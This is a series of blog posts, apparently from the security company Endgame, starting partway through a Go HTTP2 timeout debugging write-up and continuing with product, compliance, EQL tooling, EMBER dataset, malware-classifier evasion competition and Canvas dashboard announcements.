
So we asked: If we didn’t know about this nginx setting, what else did we not know about HTTP2 performance that might be contributing to connection drops and other performance issues? We knew that the original error message, “define Request.GetBody to avoid this error” indicated that we had misconfigured our Go client in at least one way and we suspected that there could be other similar issues lurking.

So, we made two changes to our test environment as preparation for further study:

Revise our use of Go http.Client so that we use the proper http.NewRequest constructor.
Apply the new http2_max_requests setting set to 1 million.

With these changes, we could confirm that our reproduction code did not trigger the original error, and with debugging on we could also confirm that nginx did not send a GOAWAY frame on the 1,000th request.

Early in the investigation, we observed that this error scenario was becoming more common as message volume increased. We assumed that under low load circumstances, the HTTP2 client would go extended periods of time without any messages to send and it would naturally timeout and close. We decided to test that assumption with a simple function that would send a single message and then wait for a timeout:

doRequest() // same function as the earlier example
time.Sleep(100 * time.Hour)

Again, the Go GODEBUG=http2debug=2 environment variable helped us watch the HTTP2 connection lifecycle. An abridged log looked like this:

...
2019/05/22 16:23:15 http2: Framer 0xc0001722a0: wrote HEADERS flags=END_HEADERS stream=1 len=65
2019/05/22 16:23:15 http2: Framer 0xc0001722a0: wrote DATA stream=1 len=2 data="{}"
...
2019/05/22 16:23:15 http2: decoded hpack field header field ":status" = "200"
...
2019/05/22 16:23:15 http2: Transport received HEADERS flags=END_HEADERS stream=1 len=111
2019/05/22 16:26:15 http2: Framer 0xc00015c1c0: read GOAWAY len=8 LastStreamID=1 ErrCode=NO_ERROR Debug=""
2019/05/22 16:26:15 http2: Transport received GOAWAY len=8 LastStreamID=1 ErrCode=NO_ERROR Debug=""
2019/05/22 16:26:15 http2: Transport readFrame error on conn 0xc000424180: (*errors.errorString) EOF
...

On the one hand, this was exactly what we expected to see. Eventually, the connection times out and is closed. On the other hand, it’s a surprise because the server is closing the connection after three minutes via the now-familiar GOAWAY frame. This matches the nginx default value of three minutes for http2_idle timeout - but why doesn’t the Go client close the idle connection itself? According to the Go docs, the value for IdleConnTimeout in the default http client is 90 seconds.

Remember earlier when we mentioned that this service uses mutual TLS? Looking over the code, we found that we were taking a naive approach to instantiating the HTTP client, essentially using code like this:

var tlsCfg tls.Config

// initialize the proper client and server certificates...

client := http.Client{
     Timeout:   30 * time.Second,
     Transport: &http.Transport{
           TLSClientConfig: tlsCfg,
     },
}

// use client for HTTP POST requests...

We had remembered to explicitly set a HTTP client timeout. As explained in this informative blog post, if we initialize a http.Client but don’t set the Timeout field, the client will never timeout HTTP requests. But our experiment showed that the same “infinite timeout” default exists for other settings as well and we did not set those properly. In particular, http.Transport.IdleConnTimeout defaults to 0, which means it will keep idle connections open forever.

So, we revised our code to explicitly define the transport-level defaults to match the suggested defaults in the Go http.DefaultTransport:

client := http.Client{
      Timeout:   30 * time.Second,
      Transport: &http.Transport{
           MaxIdleConns:          100,
           IdleConnTimeout:       90 * time.Second,
           TLSHandshakeTimeout:   10 * time.Second,
           ExpectContinueTimeout: 1 * time.Second,
           TLSClientConfig:       tlsCfg,
      },
}

Running our experiment again, we confirmed that the Go client closed the connection itself after 90 seconds:

2019/05/22 17:45:24 http2: Framer 0xc0002641c0: wrote HEADERS flags=END_HEADERS stream=1 len=65
2019/05/22 17:45:24 http2: Framer 0xc0002641c0: wrote DATA stream=1 len=2 data="{}"
...
2019/05/22 17:45:24 http2: decoded hpack field header field ":status" = "200"
...
2019/05/22 17:46:54 http2: Transport closing idle conn 0xc00022d980 (forSingleUse=false, maxStream=1)

At this point, we felt much more comfortable that we were handling the HTTP2 lifecycle correctly on both the client and server.

Conclusion

The exploration of this bug taught us several general lessons about these sort of issues.

Don’t forget about default values in Go HTTP!

Many people have written about configuring various HTTP settings in Go. We are glad that we were able to learn this lesson without experiencing a production outage due to our misconfiguration, and appreciate the other contributions that people have made to the community by documenting best practices.

Reproduction is worth the time

We could have easily fixed this specific error message by defining the Request.GetBody method and assuming the problem would be fixed. But in reality, it would have masked several places in code where we had misconfigured our client and server relative to our production workloads. Working through a minimal reproduction identified the exact behavior necessary to trigger the bug and clued us into other code changes that would improve the performance and stability of the data pipeline.

Open source greatly speeds up debugging and fixing issues

Thanks to a well-written error message we were able to explore the exact location in the Go source code that triggered our bug. Reading through that code and related locations (like the constructor for http.Request) is what taught us how to properly utilize these objects to refactor our code appropriately. Without open source, we would have worked around the bug but not truly understood the underlying logic.

Cyber security. It’s not always about hunting down the bad guys and gals. Sometimes you just gotta get things done, but getting things done is hard. There are many, many vendors in the EDR/EPP space that have a well-founded reputation for being hard to implement without services, and for being too time consuming to run.

Our June release here at Endgame, version 3.10, brings a renewed focus on getting things done efficiently, accurately, and fast.

Adversarial Behavior Whitelisting

For the past couple of years, many EDR customers end up with buyer’s remorse. They realize that once professional services have packed up and gone home, they can’t use it. Much of this is because most vendors like to stick to that old black box secrecy approach.

Much has been said about ATT&CK matrix coverage, for example, and what it means to have a strong alignment with ATT&CK. Vendors want to focus on big numbers like 100% coverage of this, or 100% prevention of that. They spend none of their marketing time telling you that a lot of adversarial behavior can be GOOD behavior, just like MS Powershell can be used for good and bad. Trying to detect every possible adversary behavior is going to light up your alerts and notifications like Clark W. Griswold’s holiday lights, and have your team chasing their tails until they can’t take it anymore.

I’m lucky enough to spend time working in our SOC, triaging alerts and looking for true and false positives. What’s been most interesting is how much time I spend investigating suspicious activity that turns out to be totally fine and expected, and probably would not have taken more than a few moments attention if I worked at that organization myself.

For example, a configuration management tool like IBM’s Tivoli Application Dependency Discovery Manager – what a name – can look VERY suspicious when it uses remote WMI calls to run asset discovery tasks. If that was my environment, I would use my local knowledge to say, “yup, this is expected.” Without that knowledge, it looks a lot like lateral movement – see ATT&CK ID T1028 – and running processes from unusual paths looks like defense evasion.

What’s great about Endgame’s new whitelisting capability is that I can stop those alerts from coming up by using a very specific whitelist for that specific adversarial tactic. So, if Endgame detects this behavior originating from a specific IP address, under a specific user account, for a specific process path, we can safely suppress the alerts from firing and leave the security team to investigate other issues.

Every single organization’s environment is different, and every security tool is going to need tuning and configuring. Anyone that tells you that everything works out-of-the-box is probably selling something useless. The difference is in the user experience, and this is how Endgame continues to bring more advanced capabilities to security teams of all sizes.

See for yourself, visit endgame.com/demo.

Today, Endgame is excited to announce that we have successfully completed the Service Organization Control (SOC) 2 Type 1 audit. Conducted by an independent third party, the audit affirms that Endgame’s information security policies, procedures and controls meet the SOC 2 standard for security, availability and confidentiality. This certification applies to all Endgame processes and procedures currently handling production workloads.

Developed by the American Institute of Certified Public Accountants (AICPA), SOC 2 certification is widely recognized as the gold standard for data security and requires companies to establish and follow strict information security policies and procedures.

The SOC 2 examination verifies the existence of internal controls to meet the requirements for the security principles set forth in the Trust Services Principles and Criteria for Security. It provides a thorough review of how Endgame’s internal controls affect the security and availability of the systems it uses to process users’ data, and the confidentiality of the information processed by these systems. This independent validation of security controls is crucial for customers in highly regulated industries.

Endgame's SOC 2 Type 1 certification demonstrates our commitment to data security through the practices and procedures we follow for protecting against unauthorized access, maintaining the availability of our service, and protecting the confidential information of customers.

Endgame understands and appreciates the trust that our customers have in us to ensure the privacy and security of their data. We have invested extensively in meeting and exceeding these expectations, including through our support of customers’ GDPR and CCPA compliance goals; our institution and enforcement of rigorous internal controls and standards associated with data access and availability; and our offering of multiple deployment options including an on-premises approach.

Our successful completion of the SOC 2 audit without any qualification or condition represents an additional step in showing how important data privacy is to our mission. It is not only an important milestone for our team, but also evidence of Endgame’s ongoing commitment to always deliver exceptional service to our customers. Effective today, current and prospective customers can request a copy of the SOC 2 attestation letter and other materials related to our data privacy practices from their sales associate.

For more information or to schedule a demo, visit: https://pages.endgame.com/request-demo-website.html

It has been an exciting summer in the security community for the Event Query Language (EQL) as we delivered presentations at Circle City Con and Bsides San Antonio. These talks showcased creative ways to hunt for adversaries in your environment with EQL. If you couldn't make either of these events, we are sorry we missed you, but good news: EQL is making its way to Blackhat USA in a joint talk with Red Canary called "Fantastic Red-Team Attacks and How to Find Them". We hope to see you there at the presentation or at Endgame’s booth (#1253) to talk more about behavior based detection with EQL. In advance of Blackhat, we’re excited to announce today’s release of more EQL analytics and tooling to make EQL even more usable and powerful.

Before we review the exciting updates to EQL, let's pause for a quick recap. EQL was built by Endgame to express relationships between events. The language is data source and platform agnostic, can answer stateful questions, and enables the hunter by including data stacking pipes to sift through data. If you have structured data, you can start asking questions now. For more background, please see the following posts: Introducing EQL,EQL For the Masses, and Getting Started with EQL.

With today’s update to 0.7, we added an interactive shell so you can better explore your own data. It will dynamically learn your schema, and includes tab-completion, syntax highlighting, table output, helpful error messages, and the ability to export results from a search to a CSV file.

In addition to the improved EQL experience, we also added over 60 new analytics to our Analytics Library. The goal of these new analytics is to help you enrich your data and gain context by matching high-noise MITRE ATT&CK™ techniques against your security events. Finally, we’ve updated our contribution guides, making it easier to contribute to the EQL community.

Interactive Shell

We’re happy to make a powerful shell available to improve your experience with EQL It is included with EQL, so after you install EQL 0.7 (pip install eql), you can use the shell to quickly explore your own data set. It has syntax highlighting and supports queries that span multiple lines. You can define a schema or teach it to learn your schema in order to validate your queries. We provided a powerful table viewer to allow for readability and flexibility of query results. With the shell, you can tab complete through EQL keywords, EQL functions, and even your own data fields.

Let's show some examples using the interactive shell by running the command eql. First, here’s a quick video.

Figure 1: A quick video showing the EQL Shell. Showing features ranging from importing data, tab completion, type/field/syntax checking, table outputs, and more!

Let’s highlight a couple features. For instance, the tab complete is very useful for quickly building your EQL query or knowing the available fields from your data.

Figure 2: Tab completion of EQL functions and data fields within EQL Shell

Additionally, the table is a powerful utility to quickly customize your EQL match results. During the alert triage process, it can be helpful to quickly make pivot tables and narrow your investigation.

Figure 3: EQL table showing query results.

Check out the documentation for more information and ways to use the EQL shell. We hope you enjoy it as much as we do!

Improved Query Validation

In the Endgame product, we recently gave our users the ability to create their own realtime detections with EQL. As part of this work, we updated EQL to include a system for detecting query errors (this functionality is available in the EQL shell as well). If you try to create a query with an unknown function, event type or field, EQL will tell you exactly where you went wrong, with a helpful message indicating the root problem. We also added a type system to the internals of EQL, and now you'll get more concise and useful errors if you pass the wrong type to a function, or try to compare across types.

Figure 4: Schema and type validation in core EQL. The first example showing an error for the field, cmdline, as it did not exist in our data and the second showing a type error, as the length function expected an array/string.

Enriching with EQL

Security isn’t always about alerting. Contextualizing an alert to further comprehend what’s happening is a great way to help security analysts go from reacting to yet another alert to understanding a potential incident. We can provide better context by enriching logs with ATT&CK™ tactics and techniques. This isn't the same thing as positively identifying something as malicious, but serves to enhance raw data with critical information for performing triage or finding trends in lower confidence detections

Often attackers use native-os tools for their own purposes, tradecraft often known as living off the land. It can become difficult for defenders to separate malicious intent from benign usage of an administrative tool, but regardless of the intent, execution of these tools is noteworthy. By enriching this data when it is seen, we may notice some seemingly benign actions representing more nefarious intent when viewed collectively. Or, defenders may use labels to prioritize and rank event collections that include certain enrichments. Either way, the crux is labeling security data, and we provide a solution with EQL.

We are releasing over 60 analytics to our the EQL Analytics Library. These are categorized as enrichments so you can start labeling your data or even start hunting for suspicious behaviors in your environment. Additionally, they are all mapped to MITRE ATT&CK™! These queries are better enrichment labels than alerting detections. A majority have high potential for noise and could represent legitimate activity, but if you’ve been struggling to enhance your coverage of ATT&CK™ without success, this kind of enrichment can help you get a great deal closer. Going farther, if you understand normal baseline activity in your environment, then you could selectively choose which EQL queries could act as detections for you and use them accordingly.

Figure 5: An example of using eqllib to survey a dataset and return analytic matches. We could use this as a means to prioritize our triage by count.

Endgame provides enrichments to our users. Attack timelines which come back with alerts are enriched with additional ATT&CK^TM-based context displayed to the user. This helps our users understand their alerts and take appropriate actions.

Figure 6: Enrichment in the Endgame platform (click image for larger view)

How to Contribute to EQL

And finally, we want to collaborate with you, so we updated our contribution guides (EQL and the Analytics Library). Our intention is to provide a clear path for you to contribute to the EQL Analytics Library or the language directly. We recommend everyone following basic git development workflows by creating branches and submitting pull requests, but we added plenty of useful help docs to assist. We also created templates to make the process as painless as possible.

We pledge to be timely in our review of all submitted work. And of course, always feel free to reach out and communicate with the EQL team via chat on Gitter, on Twitter (@eventquerylang) or with Github issues.

We hope to work with you soon!

Last year, Endgame released an open source benchmark dataset called EMBER (Endgame Malware BEnchmark for Research). EMBER contains 1.1 million portable executable (PE file) sha256 hashes scanned in or before 2017, features extracted from those PE files, a benchmark model, and a code repository that makes it easy to work with this data. Since then, researchers have been able to use this dataset to quantify how quickly models degrade [1], investigate how labels evolve over time [2], and even to investigate how malware classifiers are vulnerable to attack [3]. We were very pleased to see this response from the community, but were also aware of a couple areas where we thought EMBER could improve.

Today, we’d like to announce a new release of EMBER that we built with those improvements in mind. This release is accompanied by a new set of 1 million PE files scanned in or before 2018 and an expanded feature set. Here are some of the differences between this release and the original EMBER:

More Difficult Dataset

We found that the test set in the original EMBER 2017 dataset release was very easy to classify. The benchmark model on this data was trained with default LightGBM parameters and still achieved a 0.999 area under a receiver operating characteristic (ROC) curve. So this time around, we selected PE files to include while keeping in mind that we wanted to make the classification task harder. The benchmark model trained on the EMBER 2018 files is now optimized by a simple parameter grid search, but it still only achieves a 0.996 area under a ROC curve. This is still excellent performance, but we’re hoping this leaves more room for innovative and improved classification techniques to be developed.

Expanded and Updated Feature Set

This latest release of EMBER contains a new feature set that we are calling feature set version 2. The main difference between this feature set and version 1 features is that we are now using LIEF version 0.9.0 instead of version 0.8.3. Feature calculations using the new version of LIEF are not guaranteed to be equivalent to those using the older version.

Also, one of our goals for the features that we provided last year was that researchers could recreate decisions made by the Adobe Malware Classifier without going back to the original PE file. It turns out that the original features were insufficient to reproduce the original work. In version 2 of our feature set, the new data directory features now allow that analysis.

Thanks to a clustering analysis carried out on the original EMBER release, we found that the distribution of some feature values was very uneven. The main culprit were samples that had a large number of ordinal imports that were getting hashed to the exact same place. In order to smooth the feature space, ordinal imports are now hashed along with named imports in feature set version 2.

After freezing the development of version 2 of our feature set, we calculated these new features for the original EMBER 2017 set of files. Those new features calculated on the old files are now publicly available for download in addition to the features from the new 2018 files.

PE File Selection

Clustering analysis of EMBER 2017 also revealed extreme outliers and PE files that had exactly the same feature vector. Although this sort of dirty data is expected in the real world by any deployed static malware classifier, we wanted our benchmark dataset to better capture performance across a normalized view of the set of PE files. For this reason, we used his outlier and duplicate detection to clean some of the worst offenders before finalizing our selection for the 2018 feature set.

Adding an additional year of labels and features onto the original data release opens the door to more longitudinal studies of model performance degradation and malware family evolution. While these possibilities are exciting, they are complicated by the fact that different logic was used in each year to select the set of files that were included in the dataset. The malware and benign samples are not sampled identically from a single distribution. Depending on the goal of the research, this difference may not matter. But researchers must be aware of this when forming and testing their hypotheses.

It’s been inspiring to see all the interest in EMBER over the last year and a half. We’re hoping that this new release can further empower researchers to find new static classification techniques, quantify the performance of existing models, or simply to practice their data analysis skills. Please reach out if you have any questions or suggestions!

[1] Understanding Model Degradation In Machine Learning Models

[2] Measure Twice, Quarantine Once: A Tale of Malware Labeling over Time

[3] TreeHuggr: Discovering where tree-based classifiers are vulnerable to adversarial attack

As announced at DEFCON’s AIVillage, Endgame is co-sponsoring (with MRG-Effitas and VM-Ray) the Machine Learning Static Evasion Competition. Contestants construct a wihte-box evasion attack with access to open source code for model inference and model parameters. The challenge: modify fifty malicious binaries to evade up to three open source malware models. The catch: the modified malware samples must retain their original functionality. The prize: the contestant/team to produce the most evasions and publish the winning solution will win an NVIDIA Titan-RTX, a powerful and popular GPU for training deep learning models.

Why this competition?

Some may question why Endgame is sponsoring a competition that overtly encourages participants to evade endpoint security protections. Afterall, Endgame’s MalwareScore™ is itself a static pre-execution antimalware engine built on machine learning (ML). At Endgame, we have long espoused the view that there is no security by obscurity, and that self- and public testing are more than hygienic. Discovering and publicly sharing evasion strategies that capable contestants discover is good for security.

The competition is unrelated to the recent evasion by security researchers of commercial ML endpoint protection software. Although CylancePROTECT® was the target of the recent bypass, one should keep in mind that with enough work, any one protection component–ML or not–can be blatantly bypassed or carefully sidestepped. This is why security products should adhere to a layered protection strategy: should an attacker sidestep one defense, there are a host of other traps set with a hair trigger.

In reality, the foundation for this competition began many years ago with Endgame adversarial machine learning research to create carefully-crafted malware perturbations that evade machine learning models.

In academic circles, adversarial machine learning has largely been confined to computer vision models, wherein image pixels are subtly modified to preserve human recognition, but exploit worst-case conditions of the model to achieve catastrophic miscategorizations. With each new attack strategy also comes proposals for making machine learning more robust against these attacks.

But malware, as a structured input, is different than images. It’s harder. It’s mathematically inconvenient. And as such, we want to draw interest to this unique adversarial model. Simply put, even though Portable Executables (PE) files are a sequence of bytes in the same way an image is a sequence of pixels, they differ starkly in that when you slightly change an image pixel, the “imagey-ness” is preserved, but when you modify a byte in a PE file, you may very well corrupt the file format or destroy the program’s functionality. So, attackers must carefully constrain how they modify the PE byte stream. This point deserves to be highlighted to the academic community.

Ultimately, defenders benefit by understanding the space of functionality-preserving mutations that an attacker might apply. In reality, attacker evasion techniques more often include source code modifications or compile-time tweaks, but the model we present represents a useful framework for reasoning about PE modifications in the same framework that academics reason about pixel perturbations. The hope is that by exploring the space of adversarial perturbations, defender models can have the benefit of having anticipated some part of the evasive repertoire of an adversary, and build robustness.

A useful and fun game

Contestants will attempt to evade three open source models. MalConv is an end-to-end deep learning model. The non-negative MalConv model has an identical structure to MalConv, but is constrained to have non-negative weights which forces the model to only look for evidence of maliciousness rather than evidence of both malicious and benign byte sequences. Both of these models are end-to-end deep learning models, upon which most of the recent adversarial machine learning literature has been focused. The recently updated EMBER LightGBM model is the third model, and operates on features extracted from an input binary. Each of the models was trained on the EMBER 2018 hashes.

It’s important to note that none of the models, as presented, are production-worthy models. In particular, these are “naked” models (e.g., no whitelist/blacklist) trained on comparatively small datasets, and the thresholds have been adjusted to detect each of the competition malware samples. Thus, the EMBER model has a false positive rate of less than 5:1000, while the deep learning models have false positives rates exceeding 1:2. Nevertheless, the models represent useful targets for exploring and understanding successful evasive techniques.

A final word

Even with the chance of evasion, Machine Learning models ostensibly offer excellent detection rates at low false positive rates for detecting malware before it executes. Importantly, machine learning generalizes to new samples, evolving families and polymorphic strains. Machine Learning is much less brittle than signature-based approaches that memorize known threats, but miss subtle perturbations to those same samples. For this reason, machine learning has been an overwhelmingly positive development for information security.

We thank our partners for the tremendous amount of work and resources they’ve contributed to make this a viable competition. Watch this space for competition results.

As we have explored in prior blog posts, Endgame uses Elasticsearch as its main data store for its alerts and investigation workflows. Moreover, a number of our customers and prospects rely on Elasticsearch to collect, analyze and visualize their security data. Last June, we announced the exciting news that Endgame entered into an acquisition agreement with Elastic, however even prior to these discussions, it became clear that our customers would see significant value in being able to integrate their Endgame data into their instance of Elastic. Endgame offers integrations into other SIEM and similar products (such as Splunk and ServiceNow), and soon, we hope to make Elastic Stack Integration (Beta) available to our customers in an upcoming release. With this feature, Endgame can stream all endpoints and events directly into a user’s Elastic Stack. This feature allows users to store and search Endgame data directly in Elastic and use the variety of applications offered by Elastic.

As this year’s Product Design Intern, I thought it would be a great opportunity to explore this feature for my summer project. I wanted to highlight one of Elastic’s applications, Canvas, and explore its capabilities using data streamed from Endgame. Canvas is an application that allows users to create highly customizable dashboards using real-time data. Compared to Elastic’s other visualization apps, Canvas’ built-in editing controls and powerful expression editor gives users complete control to create useful and dynamic dashboards. This seemed like the perfect tool for me to use as a designer.

With Black Hat in early August, I had only a few weeks to come up with a design idea, implement it, and have it presentation-ready for the conference.

The Alert Dashboard

Dashboards give a high-level overview about the overall health of an environment and provide metrics for easy report generation that many security teams are required to make. While current platform features like Reporting fulfill these needs, I decided to take this opportunity to improve upon our dashboards without the limitation of designing within the current Endgame platform. Since Elastic doesn’t currently have a way to visualize security alerts within their stack, I thought an alert dashboard would be a good place to start.

Preparation

The first step to creating an alert dashboard was gathering information to decide what to include. I referenced existing dashboards and reporting metrics we use to make this decision. I also had the opportunity to interview some of our actual users and gather their impressions. Through these discussions, I learned that managers were the ones who gained the most value from dashboards and wanted an overview of the health of their security environment.

I used this research to decide what type of visualization matched the type of information users wanted to see. Afterwards, I created a rough template of how to organize these elements. With this preparation, I had a good sense of what I wanted the final dashboard to look like.

An early dashboard template

Design Process

The first step to creating an alert dashboard was to parse through the data streamed into the Elastic Stack and create the metrics I wanted. Even with only a beginner’s background in SQL, it was relatively simple for me to compose queries for the metrics I wanted displayed. Elastic also has several introductory tutorials about Canvas that are helpful to those unfamiliar with SQL.

A gif of a SQL statement being written to display live data

After all the visualizations were made, the next step was the fun part: styling them! Canvas has several in-app controls to edit an element’s color palette, text styling, and more. However, for those who really want absolute customization, there’s an option to directly edit an element’s CSS stylesheet. I wanted to emulate the feel of the current Endgame platform, so I used Endgame branding and color choices throughout my design.

A gif of the in-app style controls in use.

The Finished Product

Version one of the alert dashboard

Version two of the alert dashboard

After several iterations and helpful feedback from my co-workers, the alert dashboard was finished! I created two versions that contained similar visualizations with varying color palettes and organization.

Customization Capabilities

I created these dashboards to be displayed at the 2019 Black Hat conference earlier this month. They were one of the talking points of the Elastic Integration demo.

A picture of the Canvas Dashboard presented at the Endgame booth at Black Hat

However, while I created two versions of the alert dashboard for Black Hat, there are infinite possibilities for how the dashboard could look. One of the best parts of Canvas is its limitless customization capabilities. I came up with almost a dozen different layouts. Any of these dashboards would be great depending on how users want to visualize their information. For example, some users want as much information as possible and to see a detailed breakdown of each element. Others might want a general picture and only desire to see the highest level metrics and trends.

Some of the many dashboard variations I created during this project

Next Steps

It was an incredibly fun project to create a new alert dashboard from scratch. As a summer intern, it was awesome to see my dashboard prominently displayed at Black Hat. After exploring the Canvas application, I can say even those without a design or technical background are able to make visually striking dashboards with valuable data.

If you’re interested in learning more about the Elastic Stack Integration (Beta), feel free to reach out here. Either way, this is an exciting look into the possibilities of what will come out of the Endgame and Elastic partnership, so look forward to what happens next!